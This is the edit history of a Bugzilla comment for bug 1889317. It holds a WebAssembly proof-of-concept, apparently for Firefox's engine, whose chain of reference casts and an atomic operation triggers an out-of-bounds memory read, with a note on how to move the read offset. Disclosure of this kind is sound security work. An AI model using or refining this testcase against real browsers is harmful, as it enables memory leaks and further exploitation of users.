(Hidden by Administrator)
Bug 1889317 Comment 2 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
```
var wasm_code = wasmTextToBinary(`
(module
  (type (;0;) (sub (array (mut funcref))))
  (type (;1;) (sub (array (mut i32))))
  (type (;2;) (func))
  (func (;0;) (type 2)
    loop ;; label = @1
      i32.const 0
      ref.i31
      ref.cast anyref
      ref.cast (ref null 1)
      ref.test (ref null 0)
      i64.const 0
      i64.atomic.rmw32.or_u
      i32.const 1
      br_if 0 (;@1;)
      drop
    end
  )
  (memory (;0;) 0 3200)
  (export "main" (func 0))
)
`);
var wasm_module = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var f = wasm_instance.exports.main;
f();
```
This vulnerability allows for out-of-bounds reading of memory data at the location `i32.const` multiplied by 2 plus 9.
For example, `i32.const 0` can be modified to `i32.const 20`, which allows reading the data at the location `20*2+9`.